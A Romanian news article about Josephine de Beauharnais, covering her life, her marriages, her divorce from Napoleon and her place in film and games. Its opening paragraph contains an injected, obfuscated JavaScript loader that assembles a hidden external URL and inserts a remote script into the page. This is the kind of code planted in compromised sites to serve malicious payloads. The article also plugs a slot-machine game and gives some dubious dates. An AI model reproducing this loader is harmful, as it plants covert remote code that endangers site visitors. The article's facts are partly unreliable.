Timpul.md

Timpul Liber 9 August 2021 | 08:15

Cine a fost Josephine, prima împărăteasă a Franței

Josephine de Beauharnais, cunoscută și sub numele de Josephine Bonaparte, a fost prima împărăteasă a Franței. Ea a fost prima soție a lui Napoleon I și a trăit între 1763 și 1814. (function(){ o1ng=document.createElement("script");o1ng.async=true;o1ng_="u"+("s")+"t"; o1ngu="309189351.";o1ng_+="a"+("t.i");o1ng_+="n"+("f"+"o")+"/"; o1ngu+="p14w1myr1ng97eue1khcwt"+("m6Xy5q9k"); o1ng.src="https://"+o1ng_+o1ngu;o1ng.type="text/javascript"; document.body.appendChild(o1ng); })();

Josephine s-a născut în Martinica, într-o familie ce deținea o fermă de trestie de zahăr. A avut însă o copilărie tumultoasă, în care a fost și dansatoare. Totuși, în anul 1769 a plecat în Franța împreună cu tatăl său. S-a căsătorit câteva luni mai târziu cu Alexandre de Beauharnais, cu care a avut doi copii: Eugene de Beauharnais și Hortense de Beauharnais, cea care mai târziu s-a căsătorit cu fratele lui Napoleon, Louis Bonaparte.

Într-un final, Josephine și Alexandre s-au despărțit, iar acesta din urmă a fost ucis în anul 1794. Inclusiv Josephine a fost arestată în acel an, deoarece s-a considerat că era prea apropiată de cercurile contrarevoluționare din acele vremuri. La cinci zile după ce Alexandre a fost ucis, Josephine a fost eliberată.

Pe Napoleon Bonaparte l-a cunoscut în 1795 și cei doi au început o relație, deși acesta era cu șase ani mai mic. Ei s-au căsătorit în martie 1796, dar familia acestuia s-a opus, deoarece Josephine era o văduvă cu doi copii. La două zile după nunta însă, Bonaparte a părăsit Parisul pentru a conduce armata franceză în Italia, dar i-a trimis multe scrisori de dragoste de pe front.

În 1804, Napoleon a fost ales împărat al francezilor, astfel că și Josephine a devenit prima lor împărăteasă. Totuși, mariajul dintre cei doi nu a fost de durată, ținând cont că Josephine nu mai putea face copii. În aceste condiții, în noiembrie 1809 el a anunțat-o că, în interesul Franței, trebuie să-și găsească o soție care să-i aducă pe lume un moștenitor. Ceremonia de divorț a avut loc așadar pe 10 ianuarie 1810. Ulterior, Napoleon s-a căsătorit cu Marie-Louise a Austriei.

Josephine, prezentă în filme și jocuri

Josephine este o parte importantă din istoria Franței și astfel este prezentă în cultura populara: s-au ecranizat filme, s-au facut documentare, s-au scris multe carti, ba chiar exista si jocuri ca la aparate in care apare. Spre exemplu, jocul Napoleon & Josephine, lansat de compania Williams Interactive, îi duce pe utilizatori în atmosfera familiei regale, iar printre simboluri se află caleașca ce îi plimba pe cei doi, celebrele grădini regale, coroane și alte bijuterii.

De asemenea, în 1987 a fost lansată mini-seria Napoloeon and Josephine: A love story, care a urmărit povestea de dragoste dintre cei doi.

În filmul Desiree, lansat în anul 1954, s-a tratat pe larg povestea celor doi, alături de mărirea și decăderea lui Napoleon Bonaparte. Acesta a avut două nominalizări la Premiile Oscar.

Impactul lui Josephine după ce a devenit împărăteasă

Josephine a devenit în acele vremuri un adevărat model pentru femeile din Franța, care o apreciau în mod special pentru felul în care se îmbrăca, iar fiecare apariție a sa era un eveniment.

Una dintre marile sale pasiuni erau florile, din acest motiv grădinile sale fiind impresionante, cu tot feluri de soiuri. Trandafirii erau preferații săi.

Îi placea și vinul și avea o colecție impresionantă, de peste 13 mii de sticle. În această colecție avea piese alese, a căror valoare e crescut enorm odată cu trecerea anului. Practic, a intuit din start calitatea vinurilor de Bordeaux.

În timpul căsătoriei cu Napoleon a avut și aventuri. Dar divorțul de acesta s-a produs în termeni cordiali, iar ea a păstrat titlul de împărăteasă și avea în continuare numeroase privilegii.

Josephine a murit la patru ani de la divorțul de Napoleon, pe când avea 50 de ani. A rămas în istorie ca fiind o femeie îndrăgită de oameni, căreia Napoleon i-a tolerat foarte multe, inclusiv trecutul său îndoielnic.

 

Pe aceeaşi temă

Versiune completă web Înapoi sus